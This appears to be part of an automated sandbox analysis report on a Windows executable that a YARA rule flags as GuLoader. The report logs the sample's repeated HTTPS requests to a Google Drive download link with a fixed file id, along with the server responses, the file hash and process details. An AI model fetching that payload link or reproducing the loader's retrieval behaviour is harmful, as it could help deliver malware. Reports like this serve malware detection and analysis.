                                                      79192.168.2.1150059142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:30 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:30 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC5gx5tENMxP6y0jGxSnbNEmRc2ioje_Sviwoze7Gqxfo8uw1kc5YoJJuVYKMv-1-Yfy
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:30 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Tp_WFNzdA7p15enucgXJBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 46 45 33 36 49 45 31 6c 47 58 62 2d 45 4e 4e 43 37 5a 4a 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cFE36IE1lGXb-ENNC7ZJBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      80192.168.2.1150060172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:31 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:32 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:32 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-PGN8oj57yNafE_V2erTvCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      81192.168.2.1150061142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:32 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:33 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTVDUZlxEiF4KLvx33QbxYEfqx60jqKpdT9_mqW-Se3q-nktg5riXV9-HnfSwuJYan2
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:33 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-94ivqguTGv_bpizdqCElcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 6f 45 4b 4a 4d 49 74 46 30 45 78 71 54 6d 44 71 48 59 43 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_oEKJMItF0ExqTmDqHYCIA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      82192.168.2.1150062172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:34 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:34 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:34 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-WhZF0H8fiRx1XWd6fjsbug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      83192.168.2.1150063142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:35 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:35 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgR44WzFMtJklLZE7-HXmMu3WMgfHx6lgKfkbJbyTzgpthAyeMlE5sOCkcdaGcbczcTpuUHHOc8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:35 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-VbidvOdMJnZfCX0n9sGQ0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 30 30 6e 50 73 6e 6d 4b 31 6e 37 73 71 46 30 66 49 6e 32 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k00nPsnmK1n7sqF0fIn26A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      84192.168.2.1150064172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:36 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:36 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:36 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-aid9MdKqUnJiSa7QiLC5sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      85192.168.2.1150065142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:37 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:37 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQYsitrk7M_hOWuHD9TZcQS9bg28596iS2e1xQb7L5hgTRAqzMWwkGFFjMJyDowChgc
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:37 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-t3WNlEsGsc5xQtNeaaTF5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 56 69 6c 46 44 31 72 77 41 54 34 38 34 4e 76 4d 6c 79 56 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zVilFD1rwAT484NvMlyVKg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:23:05:31
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                      Imagebase:0x400000
                                                      File size:585'064 bytes
                                                      MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:23:05:54
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                      Imagebase:0x400000
                                                      File size:585'064 bytes
                                                      MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

